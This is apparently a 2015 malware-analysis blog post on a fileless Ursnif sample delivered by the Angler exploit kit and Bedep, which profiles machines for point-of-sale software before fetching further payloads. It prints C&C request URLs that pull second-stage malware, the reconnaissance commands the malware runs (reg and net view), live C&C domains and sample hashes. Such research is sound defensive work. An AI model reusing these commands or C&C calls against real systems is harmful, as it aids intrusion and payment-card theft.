2015-07-05 - Fileless Reco

A fileless Ursnif doing some POS focused reco

Mission Impossible via Brixe63

At begining of June, I noticed a "different" Angler pass.
No drop and Ursnif call backs.

FileLess Angler Pass and Ursnif Callback
Mon, 01 Jun 2015 14:48:06 GMT

I already encountered that "small ursnif" multiple time. In november for instance some 18ko sample pushed in Bedep 380278c243a03c70dba89af2e6d4916f (grabbing a sample doing some IAP like callback - 43fce12aace6e73fc7b1e1117595816e )

Ursnif sent to Bedep infected VM

and few days later : ff1da0bbfc66762dbc1b2af52425f211

C&C calls in november 2014 :

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1859056880&type=1
200 OK (text/html)

GET http://ipsalomenatep58highwayroad .biz:8080/photoLibrary/?user=c54acfbc9b5eef3b729f4025c17cefa2&id=1&ver=105&os=170393861&os2=512&host=0&k=1039729551&type=505
200 OK (text/html) < 2ndStage payload

What is new in that June pass is the Fileless execution of this Ursnif. In that context seeing it making some net view and registry CurrentVersion\Uninstall check

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s /v DisplayName > C:\Users\[REDACTED]\AppData\Local\Temp\28096234.TMP"
cmd /C "net.exe view > C:\Users\[REDACTED]\AppData\Local\Temp\28097562.TMP"

before calling C&C made me think this might be reco.

XTea decoded from the PCAP the sample I got was :
Running it manually i got him to grab (call &type=505) an Andromeda

Fileless Ursnif calling C&C, Grabbing Andromeda.
Andromeda Calling home.

Upon deeper looks it appears that this Ursnif is doing those kind of checks :

Case one :
- POS/SALE/STORE in the Netview output
- some URL in the cache :
Case two :
- some entries in the registry :
VeriFone (advertises itself as the "global leader in secure electronic POS solutions")
(there are 2 strings Citrix and XenApp but do not seems to be directly called)

Case three :
- None of these..so "lower value" (for them) machine.

I made some modif in my systems to fall in case one :

Trying to get the attention of the Fileless Ursnif

And as expected it's something else than Andromeda that got dropped (c&c call with &type=555) on the machine

76c240311df959961200a20f52b4026c which appears to be a signed

Signed Dll dropped by the Fileless Ursnif

 and decided to stand on the drive version of itself.

Conclusion: another smart use of the fileless capabilities of Angler.

Side Note:
It seems type 666 and type 922 are other accepted call by the C&C (one of them might be Verifone case)

Crafted C&C Calls - note:  type 666 and 922

Fiddler for those who can decrypt the traffic based on the Key is in the package (i'd be happy to hear about it )

Here is a package (multiple samples/pcap/fiddler)
Fileless Angler EK Pass (Pcap associated to first Screenshot )

[Update : 2015-09-04]
It's pushed via Bedep those day :
Fileless Ursnif pushed via Bedep but again no drop on disc (new to me method in bedep)
Sample : d8e950506fcb4617ef3bbcb16c4fba24
C&C : lokingforrealest.net (

31400 | | ACCELERATED | DE | kundenbetreuung.org | IP-Projects GmbH & Co. KG

Thanks :
Will Metcalf, Horgh_RCE and FoxIT for help/inputs.

Post Publication Readings :
Threat actor leverages windows zero-day exploit in payment card data attacks - 2016-05-10 - FireEye
PowerSniff Malware Used in Macro-based Attacks - 2016-03-11 - Palot Alto
Angler Exploit Kit Used to Find and Infect PoS Systems - 2015-07-27 - TrendMicro